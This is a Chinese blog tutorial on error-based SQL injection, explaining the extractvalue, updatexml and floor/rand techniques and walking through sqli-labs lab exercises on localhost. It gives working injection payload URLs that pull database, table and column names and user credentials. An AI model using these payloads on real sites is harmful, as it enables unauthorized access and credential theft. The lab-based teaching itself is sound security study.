sql注入——报错注入

于 2023-10-18 17:04:57 发布
阅读量1k 收藏 7
点赞数
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73756016/article/details/133862183
版权

报错注入是什么

什么是报错注入?
这是一种页面响应形式。响应过程如下:
用户在前台页面输入检索内容
后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行。
数据库将执行的结果返回给后台,后台将数据库执行的结果无加区别的显示到前台页面上。
报错注入存在的基础:两个“无加区别”后台对于输入输出的合理性没有做检查

分类

1. 通过floor()报错注入

2.通过extractValue()报错注入

3.通过updateXml()报错注入

4.通过NAME_CONST()报错注入

5.通过jion()报错注入

6.通过exp()报错注入

......

常用的是前三种注入,所以本篇只介绍前三种报错的方式

extractvalue报错注入

通过extractValue()报错注入
函数extractValue() 包含两个参数
第一个参数 XML文档对象名称 , 第二个参数 路径

eg:使用extractvalue查询xml里面的内容

> select extractvalue(doc,'/book/author/surname') from xml;

如果需要查询书名则可以用如下命令

>select extractvalue(doc,'/book/title') from xml;
那么它是如何报错的呢?

由图可知 extractvalue()函数对查询参数格式符号非常敏感,只需把符号写错可以提示报错信息

所以以下是一句extractvalue报错注入的语句

?id=100' union select 1,extractvalue(1,concat(0x7e,(select database()))),3 --+

也可以是

?id=100' and 1=extractvalue(1,concat(0x7e,(select database()))) --+

这里的0x7e相当于'~'

concat()函数的作用相当于把括号里的内容拼接起来

eg:concat(1,2)输出就是12

题目例示---sqlilabs-less5

在闭合且爆完列数后按照常规的字符型注入方法发现没有回显 判断为报错注入

利用语句

http://localhost/sql/Less-5/?id=1' union select 1,2,extractvalue(1,concat(0x7e,(select database()))) --+

报错回显出数据库名

继续爆出表名输入

http://localhost/sql/Less-5/?id=1' union select 1,2,extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+

列名

http://localhost/sql/Less-5/?id=1' union select 1,2,extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database()))) --+

数据

http://localhost/sql/Less-5/?id=1' union select 1,2,extractvalue(1,concat(0x7e,(select group_concat(username,'~',password) from users))) --+

这里用

使用函数substring解决只能返回32个字符串问题

updatexml函数报错注入

函数updatexml(XML_document,XPath_string,new_value) 包含三个参数

第一个参数: XML_document是string格式,为XML文档对象的名称,例如Doc

第二个参数: XPath string是路径,XPath格式的字符串

第三个参数: new_value,string格式,替换查找到的符合条件的数据

updatexml报错原理


同extractvalue(),输入错误的第二个参数,即更改路径的符号

题目例示---sqlilabs-less4
?id=1") and 1=updatexml(1,concat('~',(select database())),3) --+

?id=1") and 1=updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())),3) --+

?id=1") and 1=updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database())),3) --+

?id=1") and 1=updatexml(1,concat(0x7e,(select substring(group_concat(username,'~',password),1,30) from users)),3) --+

floor函数报错注入

这个报错可以展现64位的字符串

涉及到的函数

rand()函数: 随机返回0~1间的小数

floor()函数: 小数向下取整数。

向上取整数ceiling()

concat_ws()函数:将括号内数据用第一个字段连接起来

>select concat ws(-,(select database()),floor(rand()*2));

输出结果为 “security-0" 或者 "security-1"

group by子句: 分组语句,常用于,结合统计函数,根据一个或多个列,对结果集进行分组
as: 别名
count()函数:汇总统计数量

limit: 这里用于显示指定行数

报错原因

> select floor(rand()*2) from users; 根据users的行数随机显示0或1

> select floor(rand(0)*2) from users; 计算机不再随机,而是按一定顺序排序

> select floor(rand(1)*2) from users; 计算机不再随机,而是按一定顺序排序

 why?

rand()函数进行分组group by和统计count()时可能会多次执行,导致键值key重复

这句话非常难以理解 是需要翻译的中国话

我们来逐字逐句翻译一下

键值k相当于分组时的类别 比如 把人分为男女 男的有多少个 女的有多少个 这里的男女就相当于这个键值key

所以在上述语言中

security-0

security-1就是所说的键值key

题目例示---sqlilabs-less5
?id=1' union select 1,count(*),concat_ws('-',(select version()),floor(rand(0)*2)) as x from information_schema.tables group by x --+

?id=1' union select 1,count(*),concat_ws('-',(database()),floor(rand(0)*2)) as x from information_schema.tables group by x --+

这里爆表名和列名的时候出现了问题

输入代码

http://localhost/sql/Less-5/?id=1' union select 1,count(*),concat_ws('-',(select group_concat(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2)) as x from information_schema.tables group by x --+

发现没有回显

可能是字符串太长的原因

可以该用concat

?id=1' union select 1,count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2)) as x from information_schema.tables group by x --+

把中间的命令改一下 就大功告成了

阿呆不呆@qq
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
Web安全:SQL注入报错注入原理+步骤+实战操作
wangyuxiang946的博客
03-07 2111
这篇文章为大家解析报错注入的实现原理,结合实战案例讲解报错注入的使用步骤。
SQL 注入天书.pdf
08-06
SQL 注入学习天书
SQL注入——mssql注入
01-19
1、Mssql权限问题 Mssql角色: 服务器角色–针对运行整个数据库服务器设定的角色和权限。 数据库角色–针对某个特定数据库设定的角色和权限。 固定服务器角色    sysadmin             可以在 SQL Server 中执行任何活动。 serveradmin  可以设置服务器范围的配置选项,关闭服务器。 setupadmin 可以管理链接服务器和启动过程,并执行某些系统存储过程(sp_serveroption)。
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
sql注入攻击流量情况
07-18
sql注入攻击流量情况
pangolinsdl—sql注入工具
06-20
pangolinsdl—sql注入工具 很好用的sql注入工具 界面简洁好用 使用方便
报错注入是什么?一看你就明白了。报错注入原理+步骤+实战案例
热门推荐
wangyuxiang946的博客
03-12 2万+
报错注入怎么使用,报错注入步骤,报错注入原理,报错注入使用。
sql注入(6)报错注入
c10udz的博客
05-11 4761
【web安全】——报错注入
Demo不是emo的博客
01-07 1万+
SQL注入报错注入
SQL注入-报错注入
LJH1999ZN的博客
02-09 9583
sql注入报错注入的演示与介绍
最详细的SQL注入报错注入
qq_62539372的博客
06-23 1万+
最详细的sql注入报错注入,非常适合小白!!
SQL注入报错注入(floor、extractvalue、updatexml)
qq_60463414的博客
07-31 1703
sql注入报错注入
SQL注入实战之报错注入篇(updatexml extractvalue floor)
qq_41272376的博客
03-03 1301
SQL注入实战之报错注入篇(updatexml extractvalue floor) 知识铺垫 在上一篇中我们在漏洞页面中进行了SQL注入实战之联合查询,这篇文章带来的是SQL注入报错注入篇。 首先我们来细分一下SQL注入分类 SQL注入分类: 回显正常—> 联合查询 union select 回显报错—> Duplicate entry() extractvalue()    updatexml() 盲注 —>布尔型盲注 基于时间的盲注sleep()
SQL注入方法-报错注入
acepanhuan的博客
02-11 954
SQL注入方法-报错注入
SQL 报错注入详解
2301_78008478的博客
05-08 806
近期学习 SQL 报错注入,本篇文章为关于报错注入的一些个人理解,如有错误,希望指出 本文使用 sqli-labs 数据库作为示例报错注入方式有很多,其中比较常见的有 floor() 、extractvalue() 、updatexml() 三种,本篇文章主要对这三种进行分析先贴上一个常见的 payload 再进行分析 (sqli-labs Less-5) 复制首先这个 payload 和网上很多的不太一样,查阅网上相关博客时发现大多数的 payload 都是这样写的 复制这个就是把发生报错的 se
SQL注入报错注入
最新发布
Forget_liu的博客
06-10 1614
第二次是假设group by后面的字段的值在虚拟表中不存在,那就需要把它插入到虚拟表中,这里在插入时会进行第二次运算,由于rand函数存在一定的随机性,所以第二次运算的结果可能与第一次运算的结果不一致,但是这个运算的结果可能在虚拟表中已经存在了,那么这时的插入必然导致主键的重复,进而引发错误。很显然rand(0)是伪随机的,有规律可循,这也是我们采用rand(0)进行报错注入的原因,rand(0)是稳定的,这样每次注入都会报错,而rand()则需要碰运气了,我们测试结果如下。//以下案例代码是抄的。
sql 报错注入
travelnight的博客
03-15 4016
以往个人知识星球搬运 by travelnight 这里以sql-libs为例。 一、基础报错注入 这里的东西比较简单,快速略过。 访问:http://127.0.0.1/sqllabs/Less-1/ 直接构造id参数 http://127.0.0.1/sqllabs/Less-1/?id=1 直接加 ‘触发报错 直接闭合‘ 标签发现正常,说明存在报错注入。 http://127.0.0.1/sqllabs/Less-1/...
深入浅出带你学习报错注入
Spontaneous_0的博客
02-19 366
深入浅出带你学习报错注入
sql注入updatexml报错注入
06-08
SQL注入是一种常见的安全漏洞,其中updatexml是一种常用的注入方式之一。如果你在使用updatexml时遇到了报错,可能是由于以下原因: 1. SQL语句中的updatexml函数使用不正确,参数数量或类型不匹配,导致SQL语句执行失败。 2. 数据库对updatexml函数的支持不完整,某些版本的数据库可能不支持某些参数或功能,导致SQL语句执行失败。 3. 输入的注入payload不正确,可能造成语法错误或类型不匹配等问题,导致SQL语句执行失败。 为了解决这个问题,你可以尝试以下方法: 1. 检查SQL语句中updatexml函数的使用是否正确,确保参数数量和类型正确。 2. 检查数据库版本和配置,确保数据库对updatexml函数的支持完整。 3. 检查输入的注入payload是否正确,可以使用工具或手动构造payload进行测试,找出问题所在。 此外,为了避免SQL注入等安全漏洞,建议在编写代码时使用参数化查询,或对输入进行严格的过滤和验证。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值